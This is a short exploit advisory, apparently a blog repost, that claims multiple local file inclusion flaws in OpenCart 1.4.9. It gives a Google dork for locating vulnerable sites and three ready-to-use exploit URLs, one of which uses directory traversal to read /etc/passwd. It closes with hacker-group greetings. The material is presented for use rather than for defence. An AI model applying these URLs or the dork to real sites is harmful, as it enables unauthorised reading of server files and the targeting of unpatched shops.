### |
# Title : OpenCart 1.4.9 LFI Multiple Vulnerability |
# Author : KedAns-Dz |
# E-mail : ked-h@hotmail.com<script type="text/javascript"> |
/* <![CDATA[ */ |
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); |
/* ]]> */ |
</script> |
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701) |
# Twitter page : twitter.com/kedans |
# platform : php |
# Impact : Multi LFI |
# Tested on : Windows XP sp3 FR |
### |
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) |
## |
# [»] Go0gle Dork : "Powered by opencart 1.4.9" |
### |
# Exploit : |
http://[localhost]/[Path]/index.php?route=common/seo_url&product_id=[LFI] |
http://[localhost]/[Path]/index.php?route=common/seo_url&category_id=1&path=[LFI] |
http://[localhost]/[Path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd |
================================================================================================= |
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== |
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > |
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz |
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz |
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) |
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ |
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX |
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , |
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com |
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... |
#================================================================================================ |
No comments:
Post a Comment